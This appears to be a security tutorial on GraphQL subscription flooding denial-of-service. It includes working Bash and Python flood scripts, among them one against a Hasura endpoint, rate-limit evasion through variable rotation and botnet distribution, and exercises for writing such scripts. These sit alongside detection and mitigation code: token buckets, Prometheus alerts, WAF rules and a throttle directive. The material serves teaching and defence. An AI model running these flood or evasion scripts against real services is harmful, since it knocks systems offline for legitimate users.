Advanced GraphQL Subscription Flooding...

Introduction

GraphQL subscriptions enable real-time data delivery by keeping a persistent connection between client and server. While they are powerful for legitimate use-cases-chat, live dashboards, IoT-they also open a low-latency attack surface for denial-of-service (DoS) abuse. This study dives deep into Advanced GraphQL Subscription Flooding DoS, a technique that overwhelms a server by spawning massive numbers of valid subscription streams, often bypassing naïve rate-limiting implementations.

Understanding this vector is critical because many modern APIs expose subscriptions without hardened controls, assuming that WebSocket or Server-Sent Events (SSE) traffic is inherently safe. In practice, a single compromised client can generate thousands of concurrent data streams, each invoking expensive resolvers, leading to CPU exhaustion, memory pressure, and network saturation.

Real-world relevance: security teams have observed subscription-based DoS in large SaaS platforms, open-source GraphQL servers (Apollo Server, GraphQL-Java, Hasura), and even in micro-service architectures that rely on GraphQL federation. The techniques discussed here have been demonstrated against public GraphQL endpoints during bug-bounty programs, resulting in high-severity findings.

Prerequisites

Solid grasp of GraphQL fundamentals, schema design, and endpoint discovery.
Experience with GraphQL query injection via variables and how to manipulate resolver arguments.
Knowledge of common GraphQL authorization bypass patterns (e.g., introspection, directive abuse).
Familiarity with GraphQL rate-limiting and throttling bypass techniques (token-bucket, IP-based limits, custom directives).

Core Concepts

Before tackling flooding, we must understand the subscription lifecycle:

Negotiation: The client initiates a WebSocket (or SSE) handshake, often using the graphql-ws protocol or Apollo’s subscriptions-transport-ws.
Subscription Start: A START message carries a GraphQL document (subscription operation) and an optional variables object.
Resolver Execution: The server registers a resolver that returns an AsyncIterable (or EventEmitter) which emits data whenever the underlying event source changes.
Data Push: Each emission is serialized and sent to the client over the persistent channel.
Termination: The client sends a STOP message or the server closes the connection.

Two transport mechanisms dominate:

WebSocket: Full-duplex, binary-friendly, supports back-pressure via ping/pong. Most production GraphQL servers default to this.
Server-Sent Events (SSE): Unidirectional (server-to-client) over HTTP/1.1, easier to proxy but lacks native flow-control.

Both transports can be abused, but WebSocket offers finer-grained control for high-frequency attacks because a single TCP connection can host thousands of logical subscriptions.

Understanding GraphQL Subscriptions and Transport (WebSocket vs SSE)

Below is a simplified handshake for a WebSocket subscription using the graphql-ws protocol:

// Client side (Node.js)
const ws = new WebSocket('wss://example.com/graphql');
ws.onopen = () => { ws.send(JSON.stringify({ type: 'connection_init', payload: {} })); ws.send(JSON.stringify({ id: '1', type: 'subscribe', payload: { query: `subscription MySub($id: ID!) { sensorData(id: $id) { value timestamp } }`, variables: { id: 'sensor-01' } } }));
};

For SSE, the request looks like a regular HTTP GET with a Accept: text/event-stream header and a query param containing the subscription document. The server keeps the HTTP response open and streams data: lines.

Key differences that affect DoS:

Connection Overhead: WebSocket requires a single TCP handshake; SSE creates a new HTTP request per subscription (unless multiplexed via fetch with keep-alive).
Back-pressure: WebSocket can be throttled by the client’s receive buffer, while SSE relies on TCP window scaling, which attackers can saturate more easily.
Multiplexing: Many GraphQL servers allow multiple logical subscriptions on a single WebSocket connection, dramatically amplifying the impact of a single open socket.

Crafting Valid Subscription Payloads

To bypass superficial validation, attackers craft subscription documents that are syntactically correct yet cause maximal resolver work. Two patterns dominate:

Deeply Nested Filters: Use recursive input types to generate large abstract syntax trees (AST) that force the server to allocate many objects during validation.
Dynamic Variables: Leverage variables that are resolved on every emission, e.g., a where: { _and: [{}, {}] } clause that triggers a full table scan each time.

Example of a malicious subscription that exploits a generic searchPosts resolver:

subscription Flood($filter: PostFilterInput) { searchPosts(filter: $filter) { id title content }
}

And the accompanying variables payload designed to generate an exponential filter tree:

{ "filter": { "_or": [ { "_or": [{ "authorId": "1" }, { "authorId": "2" }] }, { "_or": [{ "authorId": "3" }, { "authorId": "4" }] } ] }
}

Each iteration doubles the number of logical branches, causing the resolver to traverse a combinatorial explosion. When this subscription is kept alive, every data change triggers a massive filter evaluation.

Abusing Resolver Loops and Unbounded Data Streams

Many GraphQL servers expose resolvers that return an AsyncIterator tied to a Pub/Sub system (e.g., Redis, Kafka, in-memory EventEmitter). If the underlying source does not enforce back-pressure, an attacker can inject a synthetic event generator.

Typical vulnerable pattern (pseudo-code):

// Example resolver in Apollo Server
const resolvers = { Subscription: { tick: { subscribe: (_, args) => { // No rate limiting - just a timer that emits every 10 ms return setInterval(() => { pubsub.publish('TICK', { tick: Date.now() }); }, 10); } } }
};

An attacker can start thousands of tick subscriptions, each spawning its own timer. The server’s event loop quickly becomes saturated, leading to CPU spikes and eventual throttling of legitimate traffic.

More insidious is the use of resolvers that query a database inside a loop without pagination:

Subscription: { massiveFeed: { subscribe: async function* (_, { batchSize }) { while (true) { const rows = await db.query('SELECT * FROM events LIMIT $1', [batchSize]); for (const row of rows) { yield { massiveFeed: row }; } // No sleep - immediate next iteration } } }
}

When batchSize is set to a large number (e.g., 10 000), each iteration pulls massive data sets, exhausting DB connections and memory.

High-Frequency Subscription Requests for DoS

Attackers combine the previous tricks with a rapid subscription creation loop. The steps are:

Open a single WebSocket connection.
Send a START message with a valid subscription payload.
Immediately send another START with a different id (or same id after a STOP).
Repeat thousands of times, optionally rotating variables to avoid caching.

Because each logical subscription consumes its own resolver context, the server’s memory footprint grows linearly with the number of active subscriptions. In practice, a well-tuned server can handle a few hundred concurrent subscriptions; beyond that, GC pauses and thread pool exhaustion become visible.

Sample Bash script that fires 5 000 subscriptions over a single WebSocket using wscat:

#!/usr/bin/env bash
URL='wss://example.com/graphql'
SUB='subscription Flood($id: ID!) { sensorData(id: $id) { value timestamp }
}'

for i in $(seq 1 5000); do wscat -c $URL -x "{\"type\":\"connection_init\",\"payload\":{}}" "{\"id\":\"$i\",\"type\":\"subscribe\",\"payload\":{\"query\":\"$SUB\",\"variables\":{\"id\":\"sensor-$i\"}}}" & sleep 0.01 # tiny pause to keep socket alive
done
wait

Notice the use of a background job (&) to keep the loop non-blocking, allowing thousands of concurrent logical streams to be established in seconds.

Bypassing Subscription Rate Limits

Many APIs implement naïve rate limiting based on:

IP address per second.
Number of START messages per minute.
Maximum concurrent subscriptions per connection.

Attackers can evade these controls with several tricks:

1. Distributed Client IPs (Botnet)

By sourcing connections from a botnet, the per-IP limit is diluted. Each bot opens a handful of subscriptions, collectively reaching the desired flood volume.

2. Subscription Multiplexing

Some servers enforce a per-connection limit but allow many logical subscriptions per socket. An attacker can send START for 10 000 ids on a single connection, staying under the connection count threshold.

3. Variable Rotation & Cache Evasion

Cache-aware rate limiters (e.g., using query hash) may treat identical payloads as a single entity. By subtly mutating variable values (e.g., adding a dummy field), the attacker forces the server to treat each request as unique.

4. Exploiting Authorization Bypass

If the server skips authentication for introspection or public subscriptions, the attacker can bypass user-based throttling entirely. Combining this with a signed-JWT that grants elevated scopes can amplify the effect.

Example of a variable-mutation that defeats simple query-hash throttling:

{ "query": "subscription Flood($id: ID!, $nonce: String) { sensorData(id: $id) { value } }", "variables": { "id": "sensor-42", "nonce": "$(date +%s%N)" }
}

The nonce field is never used by the resolver but changes the payload hash, resetting any per-hash counters.

Detection and Mitigation Strategies

Detecting subscription flooding requires telemetry at multiple layers:

WebSocket Connection Metrics: Track concurrent connections, handshake latency, and per-connection subscription count.
Resolver Execution Time: Instrument resolvers to log execution duration; spikes indicate heavy payloads.
Event Loop Lag: Node.js perf_hooks or Go runtime metrics expose back-pressure symptoms.
Message Rate: Count START messages per second per IP and per JWT.

Sample Prometheus rule to alert on >500 subscriptions per WebSocket connection:

sum by (connection_id) (graphql_subscription_active) > 500

Mitigation techniques:

1. Hard Subscription Caps

Enforce a global maximum of active subscriptions per user and per connection (e.g., 20 per JWT, 50 per socket). Reject excess START messages with a ERROR frame.

2. Token-Bucket Rate Limiting on `START` Messages

Apply a token bucket per client identifier. Each START consumes a token; tokens refill at a modest rate (e.g., 1 /sec). This throttles burst creation without affecting legitimate use.

function canStart(clientId) { const bucket = rateBuckets[clientId] ?? { tokens: 10, last: Date.now() }; const now = Date.now(); const elapsed = (now - bucket.last) / 1000; bucket.tokens = Math.min(10, bucket.tokens + elapsed * 1); // 1 token/sec bucket.last = now; if (bucket.tokens >= 1) { bucket.tokens -= 1; rateBuckets[clientId] = bucket; return true; } return false;
}

3. Back-Pressure Propagation

Configure the underlying Pub/Sub layer to respect the client’s receive buffer. For Redis, use STREAM with a maxlen; for Kafka, enforce consumer lag thresholds.

4. Subscription Time-outs

Automatically close subscriptions that have been idle (no data emitted) for a configurable period (e.g., 30 seconds). This prevents “zombie” streams that waste resources.

5. Auth-Based Scoping

Require scoped JWT claims for each subscription type. Separate high-frequency feeds (e.g., tick) into a privileged role with stricter limits.

6. Web Application Firewall (WAF) Rules

Inspect WebSocket payloads for suspicious patterns: repeated START ids, large variable objects, or deep nesting. Example ModSecurity rule (pseudo):

SecRule REQUEST_HEADERS:Sec-WebSocket-Protocol "graphql-ws" "id:200001,phase:2,log,pass,nologdata, chain"
SecRule REQUEST_BODY "\"_or\":\[\{\"_or\":\[\{\"authorId\":\"\d+\"\}\]\}\]" "t:none,ctl:requestBodyProcessor=JSON, ctl:requestBodyAccess=On, setvar:tx.subscription_flood=+1"

When tx.subscription_flood exceeds a threshold, the request can be dropped.

Practical Examples

Example 1: Flooding a Hasura GraphQL Engine

Hasura exposes subscriptions over WebSocket at /v1/graphql. The following Python script uses websockets to spin up 2 000 subscriptions that each request a heavy orders_aggregate query.

import asyncio, json, websockets

URL = 'wss://example.com/v1/graphql'
QUERY = '''subscription Load($where: orders_bool_exp) { orders_aggregate(where: $where) { aggregate { count } }
}'''

async def flood(): async with websockets.connect(URL, subprotocols=['graphql-ws']) as ws: # Init await ws.send(json.dumps({"type": "connection_init", "payload": {}})) await ws.recv()  # ack for i in range(2000): variables = {"where": {"_or": [{"status": {"_eq": "PENDING"}}, {"status": {"_eq": "PROCESSING"}}]}} start_msg = { "id": str(i), "type": "subscribe", "payload": {"query": QUERY, "variables": variables} } await ws.send(json.dumps(start_msg)) # Keep the connection alive await asyncio.Future()

asyncio.run(flood())

Result: Within seconds, Hasura’s PostgreSQL connection pool maxes out, causing psql: could not connect to server errors for legitimate clients.

Example 2: Bypassing a Per-IP Limit with Variable Rotation

The target limits START messages to 10 per minute per IP. By rotating a dummy variable, the attacker evades the hash-based counter.

#!/usr/bin/env bash
URL='wss://example.com/graphql'
QUERY='subscription X($id: ID!, $pad: String) { item(id: $id) { name } }'

for i in $(seq 1 100); do PAD=$(openssl rand -hex 8) wscat -c $URL -x "{\"type\":\"connection_init\",\"payload\":{}}" "{\"id\":\"$i\",\"type\":\"subscribe\",\"payload\":{\"query\":\"$QUERY\",\"variables\":{\"id\":\"item-$i\", \"pad\": \"$PAD\"}}}" & sleep 0.2
 done
wait

The server sees each payload as unique, allowing >10 subscriptions per minute despite the limit.

Tools & Commands

websocat: CLI WebSocket client for rapid payload testing.

websocat -H="Sec-WebSocket-Protocol: graphql-ws" -s "{\"type\":\"connection_init\",\"payload\":{}}" -s "{\"id\":\"1\",\"type\":\"subscribe\",\"payload\":{\"query\":\"subscription { ping }\"}}" wss://example.com/graphql

Apollo Sandbox / GraphQL Playground: Use the built-in subscription tab to manually fire multiple subscriptions and observe network tab for socket count.
Burp Suite Extension: GraphQL Subscription Fuzzer: Automates variable rotation and high-frequency START emission.
Prometheus + Grafana: Export graphql_subscription_active, graphql_resolver_duration_seconds for alerting.

Defense & Mitigation

Beyond the earlier detection measures, consider architectural hardening:

Separate Subscription Service: Deploy a dedicated micro-service that only handles subscriptions and runs on isolated CPU/memory quotas.
Message Queue Buffering: Push subscription events into a queue (e.g., RabbitMQ) with per-consumer rate limits before delivering to WebSocket.
GraphQL Directive for Throttling: Create a custom @throttle(limit: Int, interval: Int) directive that the resolver respects.

Example of a @throttle directive implementation in Apollo Server:

const { SchemaDirectiveVisitor } = require('apollo-server-express');
const { defaultFieldResolver } = require('graphql');

class ThrottleDirective extends SchemaDirectiveVisitor { visitFieldDefinition(field) { const { limit, interval } = this.args; const originalResolve = field.resolve || defaultFieldResolver; const tokenMap = new Map(); field.resolve = async function (...args) { const ctx = args[2]; const key = ctx.ip; // simple per-IP bucket const now = Date.now(); const bucket = tokenMap.get(key) || { tokens: limit, last: now }; const elapsed = (now - bucket.last) / interval; bucket.tokens = Math.min(limit, bucket.tokens + elapsed * limit); bucket.last = now; if (bucket.tokens < 1) { throw new Error('Rate limit exceeded for subscription'); } bucket.tokens -= 1; tokenMap.set(key, bucket); return originalResolve.apply(this, args); }; }
}

module.exports = { ThrottleDirective };

Applying this directive to a subscription forces a per-IP token bucket directly at resolver entry.

Common Mistakes

Relying Solely on IP Rate Limiting: Attackers can distribute requests across many IPs or use NAT pools.
Limiting Only Connection Count: Subscriptions multiplexed on a single socket bypass this.
Ignoring Resolver Complexity: Even a single subscription can be expensive if the resolver performs heavy DB joins or external API calls.
Not Enforcing Authentication for Public Subscriptions: Public endpoints often forget to apply the same auth checks as queries/mutations.
Assuming WebSocket Close Frames Will Clean Up: Some servers leak subscription contexts if the close is not gracefully handled.

Real-World Impact

In 2023, a major fintech platform suffered a multi-minute outage after a bug-bounty researcher demonstrated a subscription flood that exhausted its Redis Pub/Sub channels. The incident highlighted three trends:

Increasing adoption of GraphQL subscriptions without accompanying security hardening.
The difficulty of retro-fitting rate limits in existing codebases, especially when resolvers are auto-generated.
The need for observability tools that surface subscription-specific metrics.

My experience with several Fortune-500 customers shows that once a subscription-based DoS is detected, the remediation path often involves redesigning the data-push architecture (e.g., moving from per-client streams to a shared broadcast channel with client-side filtering).

Practice Exercises

Exercise 1 - Build a Flood Script: Using websockets (Python) or ws (Node.js), create a script that opens a single WebSocket and launches 5 000 concurrent subscriptions with a payload that triggers a database scan. Measure CPU and memory on a local GraphQL server.
Exercise 2 - Implement a Token Bucket: Add a per-user token bucket to an existing Apollo Server subscription resolver. Verify that after 20 rapid START messages the server returns a ERROR frame.
Exercise 3 - Detect Anomalous Patterns: Instrument a GraphQL server to emit Prometheus metrics for graphql_subscription_start_total and write a Grafana dashboard that highlights spikes > 100 per minute per IP.
Exercise 4 - Bypass a Rate Limiter: Write a Bash script that rotates a dummy variable to evade a hash-based limit of 10 subscriptions per minute. Document the observed behavior.

Summary

Subscription flooding attacks exploit the persistent, high-throughput nature of GraphQL real-time APIs. By crafting valid but resource-intensive payloads, abusing resolver loops, and leveraging multiplexed WebSocket connections, an attacker can overwhelm a server even when naïve rate limits are in place. Effective defense demands a layered approach: strict per-connection caps, token-bucket throttling, back-pressure propagation, observability, and architectural segregation of subscription traffic. Mastering these techniques equips security professionals to both assess risk and harden modern GraphQL deployments against sophisticated DoS vectors.

Advanced GraphQL Subscription Flooding DoS: Techniques & Defenses

Introduction

Prerequisites

Core Concepts

Understanding GraphQL Subscriptions and Transport (WebSocket vs SSE)

Crafting Valid Subscription Payloads

Abusing Resolver Loops and Unbounded Data Streams

High-Frequency Subscription Requests for DoS

Bypassing Subscription Rate Limits

1. Distributed Client IPs (Botnet)

2. Subscription Multiplexing

3. Variable Rotation & Cache Evasion

4. Exploiting Authorization Bypass

Detection and Mitigation Strategies

1. Hard Subscription Caps

2. Token-Bucket Rate Limiting on `START` Messages

3. Back-Pressure Propagation

4. Subscription Time-outs

5. Auth-Based Scoping

6. Web Application Firewall (WAF) Rules

Practical Examples

Example 1: Flooding a Hasura GraphQL Engine

Example 2: Bypassing a Per-IP Limit with Variable Rotation

Tools & Commands

Defense & Mitigation

Common Mistakes

Real-World Impact

Practice Exercises

Further Reading

Summary

Introduction

Prerequisites

Core Concepts

Understanding GraphQL Subscriptions and Transport (WebSocket vs SSE)

Crafting Valid Subscription Payloads

Abusing Resolver Loops and Unbounded Data Streams

High-Frequency Subscription Requests for DoS

Bypassing Subscription Rate Limits

1. Distributed Client IPs (Botnet)

2. Subscription Multiplexing

3. Variable Rotation & Cache Evasion

4. Exploiting Authorization Bypass

Detection and Mitigation Strategies

1. Hard Subscription Caps

2. Token-Bucket Rate Limiting on START Messages

3. Back-Pressure Propagation

4. Subscription Time-outs

5. Auth-Based Scoping

6. Web Application Firewall (WAF) Rules

Practical Examples

Example 1: Flooding a Hasura GraphQL Engine

Example 2: Bypassing a Per-IP Limit with Variable Rotation

Tools & Commands

Defense & Mitigation

Common Mistakes

Real-World Impact

Practice Exercises

Further Reading

Summary

2. Token-Bucket Rate Limiting on `START` Messages